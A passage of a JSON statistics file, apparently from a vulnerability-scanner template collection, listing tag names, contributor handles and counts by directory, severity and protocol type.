"backups","count":2},{"name":"vcenter","count":2},{"name":"payara","count":2},{"name":"upload","count":2},{"name":"cve2005","count":2},{"name":"hasura","count":2},{"name":"yii","count":2},{"name":"flir","count":2},{"name":"db","count":2},{"name":"hpe","count":2},{"name":"geowebserver","count":2},{"name":"akkadian","count":2},{"name":"ecoa","count":2},{"name":"places","count":2},{"name":"bypass","count":2},{"name":"hashicorp","count":2},{"name":"status","count":2},{"name":"akamai","count":2},{"name":"odoo","count":2},{"name":"rancher","count":2},{"name":"avantfax","count":2},{"name":"waf","count":2},{"name":"chyrp","count":2},{"name":"jeedom","count":2},{"name":"mcafee","count":2},{"name":"aviatrix","count":2},{"name":"wordfence","count":2},{"name":"bitly","count":2},{"name":"totemomail","count":2},{"name":"getsimple","count":2},{"name":"minio","count":2},{"name":"justwriting","count":2},{"name":"spark","count":2},{"name":"glassfish","count":2},{"name":"grav","count":2},{"name":"linux","count":2},{"name":"service","count":2},{"name":"axis","count":2},{"name":"qihang","count":2},{"name":"commax","count":2},{"name":"couchdb","count":2},{"name":"netsweeper","count":2},{"name":"huawei","count":2},{"name":"jsf","count":2},{"name":"hostheader-injection","count":2},{"name":"jboss","count":2},{"name":"nextjs","count":2},{"name":"harbor","count":2},{"name":"hjtcloud","count":2},{"name":"tidb","count":2},{"name":"icewarp","count":2},{"name":"yapi","count":2},{"name":"sitecore","count":2},{"name":"kong","count":2},{"name":"shellshock","count":2},{"name":"text","count":2},{"name":"lotus","count":2},{"name":"idrac","count":2},{"name":"saltstack","count":2},{"name":"netis","count":2},{"name":"storage","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"rockmongo","count":2},{"name":"horde","count":2},{"name":"chiyu","count":2},{"name":"chamilo","count":2},{"name":"nextcloud","count":2},{"name":"paloalto","count":2},{"name":"phpcollab","count":2},{"name":"showdoc","count":2},{"name":"electron","count":2},{"name":"emerge","count":2},{"name":"trixbox","count":2},{"name":"openvpn","count":2},{"name":"embed","count":2},{"name":"globalprotect","count":2},{"name":"guacamole","count":2},{"name":"axis2","count":2},{"name":"mailchimp","count":2},{"name":"adminer","count":2},{"name":"ucmdb","count":2},{"name":"liferay","count":2},{"name":"favicon","count":2},{"name":"sharepoint","count":2},{"name":"prestashop","count":2},{"name":"bucket","count":2},{"name":"webcam","count":2},{"name":"vrealize","count":2},{"name":"plesk","count":2},{"name":"kentico","count":2},{"name":"enumeration","count":2},{"name":"rstudio","count":2},{"name":"maian","count":2},{"name":"openfire","count":2},{"name":"frp","count":2},{"name":"voipmonitor","count":2},{"name":"heroku","count":2},{"name":"pega","count":2},{"name":"bruteforce","count":2},{"name":"ecology","count":2},{"name":"nagios","count":2},{"name":"aruba","count":2},{"name":"smb","count":2},{"name":"activemq","count":2},{"name":"ec2","count":2},{"name":"fortios","count":2},{"name":"mida","count":2},{"name":"xxljob","count":2},{"name":"oauth","count":2},{"name":"qcubed","count":2},{"name":"dos","count":2},{"name":"middleware","count":2},{"name":"s3","count":2},{"name":"prtg","count":2},{"name":"dolibarr","count":2},{"name":"cache","count":2},{"name":"splunk","count":2},{"name":"ilo","count":2},{"name":"leak","count":2},{"name":"natshell","count":2},{"name":"sonarqube","count":2},{"name":"sentry","count":1},{"name":"digitalocean","count":1},{"name":"jsp","count":1},{"name":"goahead","count":1},{"name":"speed","count":1},{"name":"pgadmin","count":1},{"name":"episerver","count":1},{"name":"gitea","count":1},{"name":"exponentcms","count":1},{"name":"webmin","count":1},{"name":"proftpd","count":1},{"name":"ecom","count":1},{"name":"yzmcms","count":1},{"name":"beanstalk","count":1},{"name":"nette","count":1},{"name":"vidyo","count":1},{"name":"landrayoa","count":1},{"name":"azkaban","count":1},{"name":"cloudflare","count":1},{"name":"owasp","count":1},{"name":"hiboss","count":1},{"name":"tinypng","count":1},{"name":"biometrics","count":1},{"name":"novnc","count":1},{"name":"phpfastcache","count":1},{"name":"phalcon","count":1},{"name":"starttls","count":1},{"name":"placeos","count":1},{"name":"plone","count":1},{"name":"elascticsearch","count":1},{"name":"iceflow","count":1},{"name":"cves2001","count":1},{"name":"remkon","count":1},{"name":"tcexam","count":1},{"name":"olivetti","count":1},{"name":"expressjs","count":1},{"name":"vscode","count":1},{"name":"graylog","count":1},{"name":"buildkite","count":1},{"name":"xvr","count":1},{"name":"iptime","count":1},{"name":"javascript","count":1},{"name":"mautic","count":1},{"name":"octoprint","count":1},{"name":"camunda","count":1},{"name":"tensorflow","count":1},{"name":"oscommerce","count":1},{"name":"qsan","count":1},{"name":"vnc","count":1},{"name":"couchbase","count":1},{"name":"blackboard","count":1},{"name":"mod-proxy","count":1},{"name":"twitter","count":1},{"name":"acexy","count":1},{"name":"axiom","count":1},{"name":"frontpage","count":1},{"name":"chinaunicom","count":1},{"name":"cors","count":1},{"name":"qvisdvr","count":1},{"name":"sgp","count":1},{"name":"moin","count":1},{"name":"sendgrid","count":1},{"name":"dnssec","count":1},{"name":"landray","count":1},{"name":"spip","count":1},{"name":"circontrorl","count":1},{"name":"messaging","count":1},{"name":"swagger","count":1},{"name":"testrail","count":1},{"name":"hadoop","count":1},{"name":"esmtp","count":1},{"name":"rujjie","count":1},{"name":"labtech","count":1},{"name":"sql","count":1},{"name":"wildfly","count":1},{"name":"phpunit","count":1},{"name":"visualtools","count":1},{"name":"fuelcms","count":1},{"name":"rdp","count":1},{"name":"elfinder","count":1},{"name":"openx","count":1},{"name":"zyxel","count":1},{"name":"pacsone","count":1},{"name":"servicedesk","count":1},{"name":"zenario","count":1},{"name":"zmanda","count":1},{"name":"glances","count":1},{"name":"octobercms","count":1},{"name":"blind","count":1},{"name":"expose","count":1},{"name":"sage","count":1},{"name":"redhat","count":1},{"name":"zarafa","count":1},{"name":"socomec","count":1},{"name":"details","count":1},{"name":"anchorcms","count":1},{"name":"perl","count":1},{"name":"cloudinary","count":1},{"name":"totaljs","count":1},{"name":"jenkin","count":1},{"name":"panos","count":1},{"name":"grails","count":1},{"name":"artica","count":1},{"name":"faraday","count":1},{"name":"sprintful","count":1},{"name":"solarlog","count":1},{"name":"bookstack","count":1},{"name":"oidc","count":1},{"name":"discord","count":1},{"name":"webadmin","count":1},{"name":"codeigniter","count":1},{"name":"cerebro","count":1},{"name":"mobileiron","count":1},{"name":"meraki","count":1},{"name":"postgres","count":1},{"name":"simplecrm","count":1},{"name":"tongda","count":1},{"name":"nifi","count":1},{"name":"spring","count":1},{"name":"vsftpd","count":1},{"name":"rocketchat","count":1},{"name":"dotnetnuke","count":1},{"name":"tieline","count":1},{"name":"openemr","count":1},{"name":"trane","count":1},{"name":"addpac","count":1},{"name":"clave","count":1},{"name":"pyramid","count":1},{"name":"email","count":1},{"name":"wavlink","count":1},{"name":"emc","count":1},{"name":"alerta","count":1},{"name":"wing-ftp","count":1},{"name":"jumpcloud","count":1},{"name":"shopxo","count":1},{"name":"sophos","count":1},{"name":"processmaker","count":1},{"name":"sco","count":1},{"name":"auth","count":1},{"name":"gurock","count":1},{"name":"gespage","count":1},{"name":"secmail","count":1},{"name":"geocode","count":1},{"name":"acontent","count":1},{"name":"idemia","count":1},{"name":"ssl","count":1},{"name":"mkdocs","count":1},{"name":"eyou","count":1},{"name":"visualstudio","count":1},{"name":"feifeicms","count":1},{"name":"svn","count":1},{"name":"lancom","count":1},{"name":"redmine","count":1},{"name":"basic-auth","count":1},{"name":"clink-office","count":1},{"name":"jmx","count":1},{"name":"zzzcms","count":1},{"name":"mongo","count":1},{"name":"deviantart","count":1},{"name":"xampp","count":1},{"name":"fastapi","count":1},{"name":"vsphere","count":1},{"name":"uwsgi","count":1},{"name":"cofax","count":1},{"name":"htmli","count":1},{"name":"iterable","count":1},{"name":"openerp","count":1},{"name":"panasonic","count":1},{"name":"skywalking","count":1},{"name":"nc2","count":1},{"name":"mirai","count":1},{"name":"ssltls","count":1},{"name":"drone","count":1},{"name":"magicflow","count":1},{"name":"upnp","count":1},{"name":"empirecms","count":1},{"name":"primetek","count":1},{"name":"tracer","count":1},{"name":"redis","count":1},{"name":"circontrol","count":1},{"name":"dropbox","count":1},{"name":"tpshop","count":1},{"name":"circleci","count":1},{"name":"floc","count":1},{"name":"shopizer","count":1},{"name":"nimble","count":1},{"name":"photo","count":1},{"name":"fortinet","count":1},{"name":"cgi","count":1},{"name":"gridx","count":1},{"name":"gitlist","count":1},{"name":"netrc","count":1},{"name":"avalanche","count":1},{"name":"haproxy","count":1},{"name":"cockpit","count":1},{"name":"metinfo","count":1},{"name":"bolt","count":1},{"name":"yealink","count":1},{"name":"froxlor","count":1},{"name":"graphite","count":1},{"name":"skycaiji","count":1},{"name":"autocomplete","count":1},{"name":"gsoap","count":1},{"name":"redcap","count":1},{"name":"emby","count":1},{"name":"contentkeeper","count":1},{"name":"maxsite","count":1},{"name":"interlib","count":1},{"name":"distance","count":1},{"name":"clockwatch","count":1},{"name":"servicenow","count":1},{"name":"tjws","count":1},{"name":"javafaces","count":1},{"name":"weather","count":1},{"name":"pivotaltracker","count":1},{"name":"actuator","count":1},{"name":"locations","count":1},{"name":"arl","count":1},{"name":"zcms","count":1},{"name":"miscrsoft","count":1},{"name":"websvn","count":1},{"name":"adb","count":1},{"name":"cscart","count":1},{"name":"panabit","count":1},{"name":"monitorr","count":1},{"name":"gloo","count":1},{"name":"svnserve","count":1},{"name":"optiLink","count":1},{"name":"centos","count":1},{"name":"shopware","count":1},{"name":"maccmsv10","count":1},{"name":"aspnuke","count":1},{"name":"api-manager","count":1},{"name":"clickhouse","count":1},{"name":"hubspot","count":1},{"name":"find","count":1},{"name":"mailgun","count":1},{"name":"huijietong","count":1},{"name":"opm","count":1},{"name":"razor","count":1},{"name":"solman","count":1},{"name":"commscope","count":1},{"name":"tugboat","count":1},{"name":"viewlinc","count":1},{"name":"woocomernce","count":1},{"name":"codemeter","count":1},{"name":"dbeaver","count":1},{"name":"linkedin","count":1},{"name":"xunchi","count":1},{"name":"parentlink","count":1},{"name":"burp","count":1},{"name":"nomad","count":1},{"name":"buttercms","count":1},{"name":"dompdf","count":1},{"name":"tika","count":1},{"name":"jaspersoft","count":1},{"name":"ioncube","count":1},{"name":"place","count":1},{"name":"nexusdb","count":1},{"name":"geutebruck","count":1},{"name":"bash","count":1},{"name":"keenetic","count":1},{"name":"myucms","count":1},{"name":"mara","count":1},{"name":"office365","count":1},{"name":"fortiweb","count":1},{"name":"sqlite","count":1},{"name":"tileserver","count":1},{"name":"postmessage","count":1},{"name":"bedita","count":1},{"name":"logontracer","count":1},{"name":"shoretel","count":1},{"name":"phpfusion","count":1},{"name":"phpshowtime","count":1},{"name":"fortilogger","count":1},{"name":"announcekit","count":1},{"name":"tenda","count":1},{"name":"spectracom","count":1},{"name":"comodo","count":1},{"name":"xiuno","count":1},{"name":"adiscon","count":1},{"name":"karel","count":1},{"name":"calendarix","count":1},{"name":"pcoip","count":1},{"name":"mantis","count":1},{"name":"lotuscms","count":1},{"name":"centreon","count":1},{"name":"fastcgi","count":1},{"name":"opencast","count":1},{"name":"extractor","count":1},{"name":"okta","count":1},{"name":"package","count":1},{"name":"wooyun","count":1},{"name":"argussurveillance","count":1},{"name":"natemail","count":1},{"name":"qdpm","count":1},{"name":"eprints","count":1},{"name":"acme","count":1},{"name":"ruckus","count":1},{"name":"csrfguard","count":1},{"name":"thinkadmin","count":1},{"name":"pulsesecure","count":1},{"name":"webftp","count":1},{"name":"postmark","count":1},{"name":"powercreator","count":1},{"name":"k8","count":1},{"name":"manager","count":1},{"name":"kubeflow","count":1},{"name":"route","count":1},{"name":"spidercontrol","count":1},{"name":"alibaba","count":1},{"name":"tor","count":1},{"name":"zte","count":1},{"name":"saltapi","count":1},{"name":"twitter-server","count":1},{"name":"wakatime","count":1},{"name":"bing","count":1},{"name":"node-red-dashboard","count":1},{"name":"ems","count":1},{"name":"youtube","count":1},{"name":"turbocrm","count":1},{"name":"gilacms","count":1},{"name":"synnefo","count":1},{"name":"portainer","count":1},{"name":"cse","count":1},{"name":"moinmoin","count":1},{"name":"accela","count":1},{"name":"cobub","count":1},{"name":"sidekiq","count":1},{"name":"ipstack","count":1},{"name":"omi","count":1},{"name":"st","count":1},{"name":"nearby","count":1},{"name":"calendly","count":1},{"name":"geddy","count":1},{"name":"wiki","count":1},{"name":"ntopng","count":1},{"name":"cyberoam","count":1},{"name":"expn","count":1},{"name":"k8s","count":1},{"name":"memcached","count":1},{"name":"checkpoint","count":1},{"name":"rmi","count":1},{"name":"sceditor","count":1},{"name":"ognl","count":1},{"name":"etherpad","count":1},{"name":"dvwa","count":1},{"name":"wifisky","count":1},{"name":"hortonworks","count":1},{"name":"erp-nc","count":1},{"name":"phpwiki","count":1},{"name":"glowroot","count":1},{"name":"weiphp","count":1},{"name":"elasticsearch","count":1},{"name":"seacms","count":1},{"name":"sangfor","count":1},{"name":"zms","count":1},{"name":"finereport","count":1},{"name":"selea","count":1},{"name":"owa","count":1},{"name":"clusterengine","count":1},{"name":"varnish","count":1},{"name":"roads","count":1},{"name":"pendo","count":1},{"name":"apiman","count":1},{"name":"timesheet","count":1},{"name":"cherokee","count":1},{"name":"b2evolution","count":1},{"name":"mantisbt","count":1},{"name":"ambari","count":1},{"name":"smartsense","count":1},{"name":"lg-nas","count":1},{"name":"cve202","count":1},{"name":"ns","count":1},{"name":"avtech","count":1},{"name":"realteo","count":1},{"name":"viewpoint","count":1},{"name":"embedthis","count":1},{"name":"nps","count":1},{"name":"ricoh","count":1},{"name":"asus","count":1},{"name":"eg","count":1},{"name":"redwood","count":1},{"name":"fortigate","count":1},{"name":"xml","count":1},{"name":"timezone","count":1},{"name":"opentsdb","count":1},{"name":"wamp","count":1},{"name":"fedora","count":1},{"name":"gogs","count":1},{"name":"chevereto","count":1},{"name":"mariadb","count":1},{"name":"mpsec","count":1},{"name":"subrion","count":1},{"name":"zookeeper","count":1},{"name":"plastic","count":1},{"name":"graphql","count":1},{"name":"jenzabar","count":1},{"name":"csrf","count":1},{"name":"limit","count":1},{"name":"soar","count":1},{"name":"plc","count":1},{"name":"linksys","count":1},{"name":"nedi","count":1},{"name":"spotify","count":1},{"name":"zm","count":1},{"name":"visionhub","count":1},{"name":"traefik","count":1},{"name":"sarg","count":1},{"name":"metabase","count":1},{"name":"jitsi","count":1},{"name":"mapbox","count":1},{"name":"mysql","count":1},{"name":"achecker","count":1},{"name":"mongoshake","count":1},{"name":"clockwork","count":1},{"name":"ulterius","count":1},{"name":"lutron","count":1},{"name":"ganglia","count":1},{"name":"pippoint","count":1},{"name":"appweb","count":1},{"name":"dvr","count":1},{"name":"netmask","count":1},{"name":"mediumish","count":1},{"name":"woocommerce","count":1},{"name":"h3c-imc","count":1},{"name":"ewebs","count":1},{"name":"myvuehelp","count":1},{"name":"lighttpd","count":1},{"name":"zend","count":1},{"name":"syslog","count":1},{"name":"rmc","count":1},{"name":"duomicms","count":1},{"name":"sar2html","count":1},{"name":"raspap","count":1},{"name":"opensmtpd","count":1},{"name":"klog","count":1},{"name":"shiro","count":1},{"name":"websphere","count":1},{"name":"diris","count":1},{"name":"listserv","count":1},{"name":"dom","count":1},{"name":"wazuh","count":1},{"name":"kerbynet","count":1},{"name":"rsyncd","count":1},{"name":"netdata","count":1},{"name":"xmlchart","count":1},{"name":"gunicorn","count":1},{"name":"minimouse","count":1},{"name":"crm","count":1},{"name":"majordomo2","count":1},{"name":"beanshell","count":1},{"name":"trilithic","count":1},{"name":"74cms","count":1},{"name":"lokalise","count":1},{"name":"triconsole","count":1},{"name":"tensorboard","count":1},{"name":"etouch","count":1},{"name":"monitorix","count":1},{"name":"smi","count":1},{"name":"bingmaps","count":1},{"name":"terraform","count":1},{"name":"asana","count":1},{"name":"stem","count":1},{"name":"mdb","count":1},{"name":"nerdgraph","count":1},{"name":"database","count":1},{"name":"loqate","count":1},{"name":"jquery","count":1},{"name":"pmb","count":1},{"name":"bigbluebutton","count":1},{"name":"ghost","count":1},{"name":"hiawatha","count":1},{"name":"pagespeed","count":1},{"name":"oneblog","count":1},{"name":"circle","count":1},{"name":"kindeditor","count":1},{"name":"cloudron","count":1},{"name":"tamronos","count":1},{"name":"bullwark","count":1},{"name":"mrtg","count":1},{"name":"werkzeug","count":1},{"name":"dotnet","count":1},{"name":"newrelic","count":1},{"name":"key","count":1},{"name":"gotmls","count":1},{"name":"blue-ocean","count":1},{"name":"bazarr","count":1},{"name":" default-login","count":1},{"name":"cocoon","count":1},{"name":"wmt","count":1},{"name":"gateone","count":1},{"name":"doh","count":1},{"name":"timeclock","count":1},{"name":"jeewms","count":1},{"name":"kyan","count":1},{"name":"pihole","count":1},{"name":"craftcms","count":1},{"name":"daybyday","count":1},{"name":"flexbe","count":1},{"name":"sureline","count":1},{"name":"netgenie","count":1},{"name":"smartblog","count":1},{"name":"travis","count":1},{"name":"imap","count":1},{"name":"matrix","count":1},{"name":"ueditor","count":1},{"name":"openrestry","count":1},{"name":"lanproxy","count":1},{"name":"rabbitmq","count":1},{"name":"nuxeo","count":1},{"name":"webui","count":1},{"name":"sonarcloud","count":1},{"name":"rhymix","count":1},{"name":"wondercms","count":1},{"name":"default","count":1},{"name":"jnoj","count":1},{"name":"shoppable","count":1},{"name":"weglot","count":1},{"name":"pagerduty","count":1},{"name":"loganalyzer","count":1},{"name":"playable","count":1},{"name":"phpinfo","count":1},{"name":"geolocation","count":1},{"name":"influxdb","count":1},{"name":"instagram","count":1},{"name":"plugin","count":1},{"name":"javamelody","count":1},{"name":"resourcespace","count":1},{"name":"streetview","count":1},{"name":"rockethchat","count":1},{"name":"domxss","count":1},{"name":"wavemaker","count":1},{"name":"alertmanager","count":1},{"name":"apos","count":1},{"name":"xdcms","count":1},{"name":"ruby","count":1},{"name":"sourcebans","count":1},{"name":"zeroshell","count":1},{"name":"motorola","count":1},{"name":"openweather","count":1},{"name":"exacqvision","count":1},{"name":"luftguitar","count":1},{"name":"rubedo","count":1},{"name":"robomongo","count":1},{"name":"nsasg","count":1},{"name":"scs","count":1},{"name":"nweb2fax","count":1},{"name":"okiko","count":1},{"name":"concrete","count":1},{"name":"nuuo","count":1},{"name":"dotclear","count":1},{"name":"flink","count":1},{"name":"livezilla","count":1},{"name":"fcm","count":1},{"name":"cve2006","count":1},{"name":"whm","count":1},{"name":"aura","count":1},{"name":"nordex","count":1},{"name":"ilo4","count":1},{"name":"scimono","count":1},{"name":"tectuus","count":1},{"name":"graph","count":1},{"name":"csod","count":1},{"name":"webmodule-ee","count":1},{"name":"kafdrop","count":1},{"name":"opensns","count":1},{"name":"discourse","count":1},{"name":"stripe","count":1},{"name":"salesforce","count":1},{"name":"tapestry","count":1},{"name":"darkstat","count":1},{"name":"setup","count":1},{"name":"gstorage","count":1},{"name":"krweb","count":1},{"name":"yachtcontrol","count":1},{"name":"eyelock","count":1},{"name":"directions","count":1},{"name":"elevation","count":1},{"name":"fortigates","count":1},{"name":"fiori","count":1},{"name":"square","count":1},{"name":"openstack","count":1},{"name":"szhe","count":1},{"name":"springframework","count":1},{"name":"jfrog","count":1},{"name":"spf","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":281},{"name":"dhiyaneshdk","count":278},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":67},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":53},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"melbadry9","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"kophjager007","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"randomstr1ng","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"divya_mudgal","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":6},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"xelkomy","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":5},{"name":"johnk3r","count":5},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"wisnupramoedya","count":4},{"name":"incogbyte","count":4},{"name":"tess","count":4},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"idealphase","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"me9187","count":3},{"name":"fyoorer","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"sullo","count":3},{"name":"sushantkamble","count":3},{"name":"shine","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"vsh00t","count":3},{"name":"johnjhacking","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"f1tz","count":3},{"name":"pxmme1337","count":2},{"name":"0xrudra","count":2},{"name":"gal nagli","count":2},{"name":"0xsmiley","count":2},{"name":"fabaff","count":2},{"name":"0xsapra","count":2},{"name":"0xcrypto","count":2},{"name":"g4l1t0","count":2},{"name":"foulenzer","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"whoever","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"parth","count":2},{"name":"w4cky_","count":2},{"name":"manas_harsh","count":2},{"name":"ehsahil","count":2},{"name":"sy3omda","count":2},{"name":"convisoappsec","count":2},{"name":"r3naissance","count":2},{"name":"r12w4n","count":2},{"name":"bernardofsr","count":2},{"name":"cocxanh","count":2},{"name":"swissky","count":2},{"name":"huowuzhao","count":2},{"name":"hahwul","count":2},{"name":"kiblyn11","count":2},{"name":"koti2","count":2},{"name":"ree4pwn","count":2},{"name":"gevakun","count":2},{"name":"lotusdll","count":2},{"name":"moritz nentwig","count":2},{"name":"joeldeleep","count":2},{"name":"hetroublemakr","count":2},{"name":"randomrobbie","count":2},{"name":"bp0lr","count":2},{"name":"bsysop","count":2},{"name":"afaq","count":2},{"name":"arcc","count":2},{"name":"x1m_martijn","count":2},{"name":"mohammedsaneem","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xelkomy","count":2},{"name":"0xprial","count":2},{"name":"udit_thakkur","count":2},{"name":"alifathi-h1","count":2},{"name":"vavkamil","count":2},{"name":"random-robbie","count":2},{"name":"nkxxkn","count":2},{"name":"socketz","count":2},{"name":"davidmckennirey","count":2},{"name":"d0rkerdevil","count":1},{"name":"thebinitghimire","count":1},{"name":"toufik airane","count":1},{"name":"alex","count":1},{"name":"thevillagehacker","count":1},{"name":"mah3sec_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"iampritam","count":1},{"name":"apt-mirror","count":1},{"name":"tim_koopmans","count":1},{"name":"petruknisme","count":1},{"name":"smaranchand","count":1},{"name":"@dwisiswant0","count":1},{"name":"rodnt","count":1},{"name":"cookiehanhoan","count":1},{"name":"shifacyclewla","count":1},{"name":"pratik khalane","count":1},{"name":"bjhulst","count":1},{"name":"droberson","count":1},{"name":"andysvints","count":1},{"name":"akshansh","count":1},{"name":"mesaglio","count":1},{"name":"52971","count":1},{"name":"push4d","count":1},{"name":"brabbit10","count":1},{"name":"manuelbua","count":1},{"name":"_harleo","count":1},{"name":"yashgoti","count":1},{"name":"hakluke","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ahmed sherif","count":1},{"name":"geraldino2","count":1},{"name":"0xteles","count":1},{"name":"rojanrijal","count":1},{"name":"patralos","count":1},{"name":"izn0u","count":1},{"name":"_c0wb0y_","count":1},{"name":"luci","count":1},{"name":"alph4byt3","count":1},{"name":"th3.d1p4k","count":1},{"name":"blckraven","count":1},{"name":"sickwell","count":1},{"name":"taielab","count":1},{"name":"0xd0ff9","count":1},{"name":"shreyapohekar","count":1},{"name":"wabafet","count":1},{"name":"0xtavian","count":1},{"name":"thezakman","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"mubassirpatel","count":1},{"name":"akash.c","count":1},{"name":"zandros0","count":1},{"name":"noamrathaus","count":1},{"name":"mass0ma","count":1},{"name":"udyz","count":1},{"name":"andirrahmani1","count":1},{"name":"ooooooo_q","count":1},{"name":"micha3lb3n","count":1},{"name":"evolutionsec","count":1},{"name":"ahmetpergamum","count":1},{"name":"elder tao","count":1},{"name":"infosecsanyam","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"adrianmf","count":1},{"name":"mhdsamx","count":1},{"name":"bad5ect0r","count":1},{"name":"jrolf","count":1},{"name":"soyelmago","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"jteles","count":1},{"name":"tirtha_mandal","count":1},{"name":"sec_hawk","count":1},{"name":"undefl0w","count":1},{"name":"yavolo","count":1},{"name":"vzamanillo","count":1},{"name":"ilovebinbash","count":1},{"name":"berkdusunur","count":1},{"name":"exploitation","count":1},{"name":"xstp","count":1},{"name":"juicypotato1","count":1},{"name":"yashanand155","count":1},{"name":"retr0","count":1},{"name":"clarkvoss","count":1},{"name":"cristi vlad (@cristivlad25)","count":1},{"name":"jeya seelan","count":1},{"name":"aresx","count":1},{"name":"raesene","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"becivells","count":1},{"name":"kurohost","count":1},{"name":"chron0x","count":1},{"name":"defr0ggy","count":1},{"name":"x6263","count":1},{"name":"kre80r","count":1},{"name":"ajaysenr","count":1},{"name":"@ofjaaah","count":1},{"name":"lark lab","count":1},{"name":"kabirsuda","count":1},{"name":"whynotke","count":1},{"name":"fmunozs","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"0xrod","count":1},{"name":"oscarintherocks","count":1},{"name":"c3l3si4n","count":1},{"name":"b0yd","count":1},{"name":"borna nematzadeh","count":1},{"name":"pdp","count":1},{"name":"naglinagli","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"furkansenan","count":1},{"name":"luskabol","count":1},{"name":"nerrorsec","count":1},{"name":"intx0x80","count":1},{"name":"flag007","count":1},{"name":"kareemse1im","count":1},{"name":"daviey","count":1},{"name":"s1r1u5_","count":1},{"name":"philippdelteil","count":1},{"name":"b4uh0lz","count":1},{"name":"co0nan","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"elmahdi","count":1},{"name":"remonsec","count":1},{"name":"pudsec","count":1},{"name":"notsoevilweasel","count":1},{"name":"omarkurt","count":1},{"name":"absshax","count":1},{"name":"nvn1729","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"un-fmunozs","count":1},{"name":"ohlinge","count":1},{"name":"fopina","count":1},{"name":"streetofhackerr007","count":1},{"name":"forgedhallpass","count":1},{"name":"zhenwarx","count":1},{"name":"ldionmarcil","count":1},{"name":"nytr0gen","count":1},{"name":"makyotox","count":1},{"name":"its0x08","count":1},{"name":"gboddin","count":1},{"name":"dawid-czarnecki","count":1},{"name":"ringo","count":1},{"name":"ipanda","count":1},{"name":"0ut0fb4nd","count":1},{"name":"orpheus","count":1},{"name":"j33n1k4","count":1},{"name":"deena","count":1},{"name":"elouhi","count":1},{"name":"sshell","count":1},{"name":"0h1in9e","count":1},{"name":"qlkwej","count":1},{"name":"willd96","count":1},{"name":"alperenkesk","count":1},{"name":"rotemreiss","count":1},{"name":"b0rn2r00t","count":1},{"name":"knassar702","count":1},{"name":"revblock","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"sicksec","count":1},{"name":"bolli95","count":1}],"directory":[{"name":"cves","count":836},{"name":"vulnerabilities","count":327},{"name":"exposed-panels","count":270},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":141},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":750},{"name":"high","count":649},{"name":"medium","count":475},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2211},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} 